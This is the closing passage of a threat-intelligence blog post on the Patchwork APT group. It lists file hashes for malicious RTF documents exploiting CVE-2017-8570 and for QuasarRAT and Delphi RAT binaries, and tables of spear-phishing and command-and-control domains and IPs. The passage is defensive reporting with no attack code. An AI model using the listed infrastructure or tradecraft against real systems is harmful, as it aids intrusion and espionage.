</table> <table style="border: 1px solid #c6c6c6; width: 797px; height: 180px;" border="1"> <tbody> <tr> <th style="background-color: #f2f2f2; color: #505050; text-align: left; padding: 6px; width: 87px;" valign="middle">Filename</th> <th style="text-align: left; background-color: #ffffff; color: #505050; padding: 6px; width: 709px;" valign="middle"> <p class="p1"><span class="s1">Part-I.doc</span></p> </th> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 87px;">File Size</th> <td style="padding: 6px; width: 709px;"> <p class="p1"><span class="s1">11349102 </span><span style="font-family: inherit; font-size: inherit;">bytes</span></p> </td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 87px;">MD5</th> <td style="padding: 6px; width: 709px;"> <p class="p1"><span class="s1">92942c54224cd462dd201ae11a560bb8</span></p> </td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 87px;">SHA1</th> <td style="padding: 6px; width: 709px;"> <p class="p1"><span class="s1">85a21624df2211af3daf05c86a3fbea8271059d3</span></p> </td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 87px;">Notes</th> <td style="padding: 6px; width: 709px;">Malicious RTF document that exploits CVE-2017-8570 and drops QuasarRAT file qrat.exe. 
This is the same file described above.</td> </tr> </tbody> </table> <table style="border: 1px solid #c6c6c6; width: 797px; height: 180px;" border="1"> <tbody> <tr> <th style="background-color: #f2f2f2; color: #505050; text-align: left; padding: 6px; width: 87px;" valign="middle">Filename</th> <th style="text-align: left; background-color: #ffffff; color: #505050; padding: 6px; width: 709px;" valign="middle"> <p class="p1"><span class="s1">Part-II.doc</span></p> </th> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 87px;">File Size</th> <td style="padding: 6px; width: 709px;"> <p class="p1"><span class="s1">10156713 </span><span style="font-family: inherit; font-size: inherit;">bytes</span></p> </td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 87px;">MD5</th> <td style="padding: 6px; width: 709px;"> <p class="p1"><span class="s1">e32668e569362c96cc56db368b7e821e</span></p> </td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 87px;">SHA1</th> <td style="padding: 6px; width: 709px;"> <p class="p1"><span class="s1">dadc493abbe3e21610539e1d5a42f523626a6132</span></p> </td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 87px;">Notes</th> <td style="padding: 6px; width: 709px;">Malicious RTF document that exploits CVE-2017-8570 and drops QuasarRAT file mico-audio.exe. 
Upon execution it will be installed under the filename crome.exe.</td> </tr> </tbody> </table> <table style="border: 1px solid #c6c6c6; width: 797px; height: 180px;" border="1"> <tbody> <tr> <th style="background-color: #f2f2f2; color: #505050; text-align: left; padding: 6px; width: 88px;" valign="middle">Filename</th> <th style="text-align: left; background-color: #ffffff; color: #505050; padding: 6px; width: 708px;" valign="middle"> <p class="p1"><span class="s1">vsrss.exe</span></p> </th> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 88px;">File Size</th> <td style="padding: 6px; width: 708px;"> <p class="p1"><span class="s1">446976 </span><span style="font-family: inherit; font-size: inherit;">bytes</span></p> </td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 88px;">MD5</th> <td style="padding: 6px; width: 708px;"> <p class="p1"><span class="s1">5c3456d5932544b779fe814133344fdb</span></p> </td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 88px;">SHA1</th> <td style="padding: 6px; width: 708px;"> <p class="p1"><span class="s1">7ab750afb25457a81c27a98dc6dfd51c27e61b0e</span></p> </td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 88px;">Notes</th> <td style="padding: 6px; width: 708px;">Delphi RAT file that beacons to ebeijingcn.live.</td> </tr> </tbody> </table> <table style="border: 1px solid #c6c6c6; width: 797px; height: 180px;" border="1"> <tbody> <tr> <th style="background-color: #f2f2f2; color: #505050; text-align: left; padding: 6px; width: 85px;" valign="middle">Filename</th> <th style="text-align: left; background-color: #ffffff; color: #505050; padding: 6px; width: 711px;" valign="middle"><span class="s1">mico-audio.exe, </span>crome.exe</th> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: 
left; padding: 6px; width: 85px;">File Size</th> <td style="padding: 6px; width: 711px;"><span class="s1">494592 </span>bytes</td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 85px;">MD5</th> <td style="padding: 6px; width: 711px;"><span class="s1">2d8e9fb75e6e816cad38189691e9c9c8</span></td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 85px;">SHA1</th> <td style="padding: 6px; width: 711px;">2b9a2d5b34b4d79fdfd6c7b861311b12d1627163</td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 85px;">Notes</th> <td style="padding: 6px; width: 711px;">QuasarRAT binary that beacons to hardcoded IP 209.58.176.201 and domain sastind-cn.org. File starts as mico-audio.exe and installs to C:\Users\%USERNAME%\AppData\Roaming\google-chrome\crome.exe.</td> </tr> </tbody> </table> <p><span style="font-size: 2.4rem; font-weight: bold;"><br /> Network Indicators</span></p> <div class="number1 alt2 line index0"> <table style="border: 1px solid #c6c6c6; width: 100%;" border="1"> <tbody> <tr> <th style="text-align: left; background-color: #f2f2f2; color: #505050; padding: 6px;" valign="middle"><strong>Hostname</strong></th> <th style="text-align: left; background-color: #f2f2f2; color: #505050; padding: 6px;" valign="middle"><strong>IP Address</strong></th> <th style="text-align: left; background-color: #f2f2f2; color: #505050; padding: 6px;" valign="middle"><strong>Notes</strong></th> </tr> <tr> <td style="padding: 6px;">mailcenter.support</td> <td style="padding: 6px;">221.121.138.139</td> <td style="padding: 6px;">Domain used to for sending spear phishes and user tracking.</td> </tr> <tr> <td style="padding: 6px;">chinapolicyanalysis.org</td> <td style="padding: 6px;">185.130.212.168</td> <td style="padding: 6px;">Domain used for spear phish sender e-mail address and to host malicious documents.</td> </tr> <tr> <td 
style="padding: 6px;">fprii.net</td> <td style="padding: 6px;">185.130.212.254</td> <td style="padding: 6px;">Domain used for spear phish sender e-mail address and to host malicious documents.</td> </tr> <tr> <td style="padding: 6px;"><span class="nolink">mericcs.org</span></td> <td style="padding: 6px;">221.121.138.141</td> <td style="padding: 6px;">Domain used for spear phish sender e-mail address and to host malicious documents.</td> </tr> <tr> <td style="padding: 6px;">tautiaos.com</td> <td style="padding: 6px;">43.249.37.199</td> <td style="padding: 6px;">Command and control server observed from QuasarRAT malware.</td> </tr> <tr> <td style="padding: 6px;">sastind-cn.org</td> <td style="padding: 6px;">209.58.176.201</td> <td style="padding: 6px;">Command and control server observed from QuasarRAT malware.</td> </tr> <tr> <td style="padding: 6px;">ebeijingcn.live</td> <td style="padding: 6px;">209.58.169.91</td> <td style="padding: 6px;">Command and control server observed from Delphi RAT malware.</td> </tr> </tbody> </table> </div>
<div class="post-tags"> <a href="https://www.volexity.com/blog/tag/apt/">APT</a>, <a href="https://www.volexity.com/blog/tag/patchwork/">Patchwork</a> </div> </div> </article> </section> </div> </main>
<footer class="footer"> <address class="footer-copyright">© 2024 Volexity. All Rights Reserved.</address> </footer></body> </html>